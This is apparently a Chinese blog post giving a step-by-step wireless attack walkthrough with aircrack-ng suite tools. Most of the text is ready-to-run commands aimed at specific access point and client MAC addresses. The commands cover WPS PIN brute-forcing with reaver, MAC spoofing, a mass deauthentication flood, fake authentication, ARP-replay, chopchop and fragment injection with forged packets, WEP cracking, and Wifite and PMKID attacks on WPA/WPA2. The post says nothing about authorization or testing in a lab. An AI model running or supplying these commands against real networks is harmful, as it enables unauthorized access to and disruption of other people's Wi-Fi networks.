H5W3
当前位置:H5W3 > 其他技术问题 > 正文

aireplay包注入攻击实践

reaver爆破WPS PIN码:

airodump-ng wlan0

reaver -i wlan0 -b D0:76:E7:51:2A:78 -vv

macchanger更改MAC地址:

macchanger -r wlan0

-r:随机更换MAC

-m:设置指定的MAC地址

macchanger -m 72:8e:9c:2d:a8:bb wlan0

 

airodump-ng –bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon

当目标在有客户端在进行下载、看视频等操作时Date值会剧增。

 

此时开启wireshark打开airodump-ng捕获的cap数据包,可以看到客户端与路由器之间的交互信息

为了能够快速获得大量有用的数据包,可以使用deauth攻击将客户端与目标AP的连接打断再重连。

aireplay-ng –deauth 20000 -a 50:2B:73:18:ED:81 -c A4:50:46:E0:FA:06 wlan0mon

 

airodump-ng –bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon

50:2B:73:18:ED:81 00:02:6f:be:66:41

fakeauth攻击

当目标AP无客户端连接时,我们可以使用无线网卡进行fakeauth(伪认证)攻击与目标AP交互。

查看无线网卡MAC使用macchanger -s wlan0mon命令。

aireplay-ng –fakeauth 0 -a 50:2B:73:18:ED:81 -c 00:02:6f:be:66:41 wlan0mon

–fakeauth delay:伪装一个客户端和AP进行连接,其中delay表示连接的延迟时间。

 

ArpRequest注入攻击

ArpRequest注入攻击是一种抓包后分析重发的过程,通过这种方式可以刺激产生大量交互数据。

aireplay-ng –arpreplay -b 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon

 

chopchop攻击

aireplay-ng –chopchop -a 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon

–chopchop:快速攻击模式,该攻击模式用来获得一个包含密钥数据的xor文件。

然后使用Packetforge-ng(网络数据包伪造工具)伪造数据包,packetforge-ng使用方法如下:

packetforge-ng <mode> <options>

packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y replay-1219-232225.xor -w chopchop-packet

-0,–arp:伪造一个arp的数据包

-l <ip[:port]> : 设置源IP地址和端口

-k <ip[:port]> : 设置目标IP地址和端口

-y <file> : 从指定文件读取PRGA(wep加密中间量)

aireplay-ng -2 -r chopchop-packet wlan0mon

-2,–interactive : 交互式帧选择

-r <file> : 从pcap文件中提取数据包

aircrack-ng chopchop-01.cap

fragment攻击

fargmentg攻击通过生成有效的密钥流来进一步进行来破解无线密码。

aireplay-ng –fragment -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 wlan0mon

packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1219-232225.xor -w fargment-packet

aireplay-ng -2 -r fragment-packet wlan0mon

aircrack-ng fragment-01.cap

WiFite破解WEP/WPA/WPA2

Wifite是一款自动化wifi密码破解工具,特点是支持多个wep,wpa加密的wifi网络,而且过程自动配置,无需人员干预!而且WiFi支持调用hcxdumptool、hcxtools和hashcat进行PMKID攻击。

PMKID攻击是一种无需四次握手包即可破解WPA&WPA2密码的攻击方式,使用PMKID破解WPA预共享密钥的方法,与现有的其它破解方法不同,该方法不再需要抓取完整的EAPOL四次握手包,只需要一个EAPOL帧中的RSN IE(Robust Security Network Information Element)即可

未经允许不得转载:H5W3 » aireplay包注入攻击实践

赞 (0)